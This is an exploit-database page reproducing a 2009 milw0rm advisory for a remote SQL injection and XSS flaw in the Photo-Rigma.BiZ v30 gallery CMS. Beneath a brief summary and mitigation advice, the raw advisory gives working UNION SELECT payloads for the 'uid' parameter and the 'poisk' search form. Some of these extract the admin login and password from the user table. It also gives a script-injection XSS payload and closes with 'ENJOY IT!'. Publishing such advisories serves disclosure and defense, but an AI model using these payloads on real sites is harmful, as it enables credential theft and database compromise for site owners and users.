header-logo
Suggest Exploit
vendor:
Photo-Rigma.BiZ
by:
Photo-Rigma.BiZ Team
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Photo-Rigma.BiZ
Affected Version From: v30
Affected Version To: v30
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

Remote SQL Injection (SQLi) Vulnerability

Photo-Rigma.BiZ v30 is vulnerable to a Remote SQL Injection vulnerability. This vulnerability allows an attacker to execute arbitrary SQL commands on the vulnerable system. This can be exploited to bypass authentication, access, modify and delete data within the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	   REMOTE SQL INJECTION (SQLi) VULNERABILITY	             	     |
|--------------------------------------------------------------------------------------------|
|                         	|      Photo-Rigma.BiZ v30     |		 	     |
|  CMS INFORMATION:		 ------------------------------			             |
|										             |
|-->WEB: http://foto.rigma.biz (affected)		     				     |
|-->DOWNLOAD: http://sourceforge.net/projects/photo-rigmabiz/ 	   		             |
|-->DEMO: http://foto.rigma.biz								     |
|-->CATEGORY: CMS / Portals								     |
|-->DESCRIPTION: Photo gallery open source project.	                                     |											     |
|-->RELEASED: 2009-04-24								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3								     |
|-->DORK: N/A										     |
|-->CATEGORY: SQL INJECTION (SQLi) / XSS						     |
|-->AFFECT VERSION: V30						     			     |
|-->Discovered Bug date: 2009-04-24							     |
|-->Reported Bug date: 2009-04-24							     |
|-->Fixed bug date: Not fixed								     |
|-->Info patch: Not fixed							             |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| SQL INJECTION  ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||




<<<<<<<<ºººººººººººººº----------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~----------ººººººººººººººº>>>>>>>>
				CONDITION: magic_quotes_gpc=off
<<<<<<<<ººººººººººººº---------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~------------ººººººººººººººº>>>>>>>>



#######################
#######################
## PROOF OF CONCEPT: ##
#######################
#######################


1.- Get var ::::: "uid":



http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*



2.- Search Post Form ::::: "poisk":



%' AND 0 UNION ALL SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#



~~~---->>Return: version and database.


###############
###############
##  EXPLOIT: ##
###############
###############


1.-


http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,login,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user+WHERE+id=1/*



2.-


%' AND 0 UNION ALL SELECT 1,2,3,concat(login,'<<::>>',password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM user WHERE id=1#



~~~---->>Return: login and password for user id one (admin).



    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| XSS (SEARCH)   ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||



Search Post Form --> "><script>alert('y3nh4ck3r was here!')</script>



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!



#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##       GREETZ TO: JosS and all spanish Hack3Rs community!          ##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-04-24]

Navigation

Suggest Exploit

Services By CQR